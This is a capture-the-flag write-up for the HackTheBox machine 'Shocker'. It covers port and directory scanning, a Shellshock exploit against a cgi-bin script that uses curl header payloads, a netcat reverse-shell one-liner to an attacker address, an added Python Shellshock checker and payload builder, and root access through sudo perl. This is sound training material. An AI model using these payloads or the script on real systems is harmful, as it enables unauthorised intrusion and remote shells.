HackTheBox: Shocker
1. Port scan
nmap -Pn 10.10.10.56
nmap -Pn -p1000- 10.10.10.56
Between the two scans there are 2 open ports: 80 and 2222. (Note that the default scan covers nmap's top 1000 ports, not 1-1000, so a single nmap -p- is the safer way to get full coverage.)
2. OS and service scan
nmap -A -p80,2222 10.10.10.56
3. Vuln scan
nmap --script vuln -p80,2222 10.10.10.56
4. nikto
nikto -h http://10.10.10.56
5. gobuster and dirb
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.10.10.56/ -x php,txt,html,sh,cgi -q
gobuster with the medium wordlist and five extensions takes a long time, so while it was still running I used dirb instead; its small default wordlist is enough here.
dirb http://10.10.10.56/
Further directory enumeration, starting with cgi-bin, which dirb turned up
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.10.10.56/cgi-bin/ -x php,txt,html,sh,cgi -q
There’s user.sh
6. Access HTTP Site
Nothing of interest on the main page.
7. HTTP Shellshock
Since user.sh sits in cgi-bin and is presumably a bash CGI script, let's test for Shellshock (CVE-2014-6271)
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" http://10.10.10.56/cgi-bin/user.sh
It works: the response body contains /etc/passwd. The two echo calls matter: they emit the blank line that terminates the CGI header block, so the command output is returned as the body instead of Apache failing with a 500. I can proceed to getting a reverse shell
Prepare for listener
rlwrap nc -lvp 443
Trigger the reverse shell with the same header, replacing <attacker ip> with the listener's address
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attacker ip> 443 >/tmp/f'" http://10.10.10.56/cgi-bin/user.sh
Back to the listener, I got the shell.
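The curl one-liners above are enough for a single known endpoint, but a reusable checker should prove execution with a token it chose itself rather than by eyeballing /etc/passwd, and should try every header Apache exports into the CGI environment, not only User-Agent. The script below is an added example, not part of the original write-up: the header list, the default target URL and the function names are my assumptions, and the reverse-shell builder reproduces the write-up's mkfifo one-liner in parameterised form.

```python
#!/usr/bin/env python3
"""Shellshock (CVE-2014-6271) checker for a CGI endpoint.

Added example for this write-up, not code from the original post. The
candidate headers and the default target URL are assumptions. The point is
the marker-based check: if a random token we asked the target to echo comes
back in the body, the command really executed.
"""
import secrets
import sys
import urllib.error
import urllib.request

# Apache exports these request headers into the CGI environment
# (HTTP_USER_AGENT, HTTP_REFERER, HTTP_COOKIE, ...). Any of them reaches a
# vulnerable bash as an environment variable. (Assumed list.)
CANDIDATE_HEADERS = ("User-Agent", "Referer", "Cookie", "X-Shellshock")


def build_payload(command: str) -> str:
    """Return the header value that triggers the bug.

    '() { :; };' makes bash parse the value as a function definition and
    then keep executing what follows. The two 'echo's emit the blank line
    that ends the CGI header block, so the command output is returned as
    the body instead of Apache answering 500 and swallowing it.
    """
    if "'" in command:
        raise ValueError("command must not contain single quotes")
    return f"() {{ :; }}; echo; echo; /bin/bash -c '{command}'"


def response_proves_execution(body: str, marker: str) -> bool:
    """True only if the marker we asked the target to echo came back."""
    return marker in body


def reverse_shell_command(attacker_ip: str, port: int) -> str:
    """The write-up's named-pipe reverse shell, parameterised."""
    return (
        "rm -f /tmp/f;mkfifo /tmp/f;"
        f"cat /tmp/f|/bin/sh -i 2>&1|nc {attacker_ip} {port} >/tmp/f"
    )


def probe(url: str, header: str, value: str, timeout: float = 10.0) -> str:
    """Send one request and return the body, including bodies of 5xx answers."""
    req = urllib.request.Request(url, headers={header: value})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.read().decode("utf-8", "replace")


def scan(url: str) -> list:
    """Return the names of the headers through which a command executed."""
    marker = "ss" + secrets.token_hex(8)
    payload = build_payload(f"echo {marker}")
    return [h for h in CANDIDATE_HEADERS
            if response_proves_execution(probe(url, h, payload), marker)]


if __name__ == "__main__":
    # Default target is the box from the write-up; override on the command line.
    target = sys.argv[1] if len(sys.argv) > 1 else "http://10.10.10.56/cgi-bin/user.sh"
    hits = scan(target)
    if hits:
        print(f"{target}: command execution via header(s) {', '.join(hits)}")
        print("reverse shell payload:", build_payload(reverse_shell_command("<attacker ip>", 443)))
    else:
        print(f"{target}: no execution observed")
```

Run it as `python3 shellshock_check.py http://10.10.10.56/cgi-bin/user.sh` with the listener from step 7 already up; the printed payload drops straight into the `-H "user-agent: ..."` argument of curl. The single-quote guard exists because the payload wraps the command in single quotes for `bash -c`; a quote inside the command would break out of that wrapper and the request would silently do nothing useful.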
8. Privilege Escalation
Start by exploring the home directories
cd /home
ls -la
cd shelly
ls -la
I got user.txt
Another thing is .sudo_as_admin_successful, which Ubuntu creates when a user runs sudo successfully, so shelly has some sudo rights worth checking
Verify with sudo -l
sudo -l
perl can be run as root through sudo.
Following the GTFOBins entry for perl
sudo perl -e 'exec "/bin/sh";'
cd /root
ls -la